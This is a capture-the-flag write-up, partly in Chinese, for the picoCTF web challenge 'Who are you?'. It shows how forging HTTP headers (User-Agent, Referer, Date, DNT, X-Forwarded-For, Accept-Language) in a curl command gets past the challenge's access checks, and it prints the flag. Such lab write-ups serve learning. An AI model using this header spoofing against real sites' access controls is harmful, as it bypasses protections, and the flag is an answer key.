Who are you?

points:100

Description

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:38322/

Hints

It ain’t much, but it’s an RFC https://tools.ietf.org/html/rfc2616

Solution

一開始可以看到網頁有個提示:use PicoBrowser
Image

User-Agent: PicoBrowser

I don’t trust users visiting from another site.

Referer: http://mercury.picoctf.net:38322/

Sorry, this site only worked in 2018.

Date: 2018

I don’t trust users who can be tracked.

DNT: 1

This website is only for people from Sweden.

X-Forwarded-For: 2.16.66.0

You’re in Sweden but you don’t speak Swedish?

Accept-Language: sv

What can I say except, you are welcome

使用curl更改配送後送出得到flag

1
2
3
4
5
6
7
curl 'http://mercury.picoctf.net:38322/' \
--header 'User-Agent: PicoBrowser' \
--header 'Referer: http://mercury.picoctf.net:38322/' \
--header 'Date: 2018' \
--header 'DNT: 1' \
--header 'X-Forwarded-For: 2.16.66.0' \
--header 'Accept-Language: sv'

flag: picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}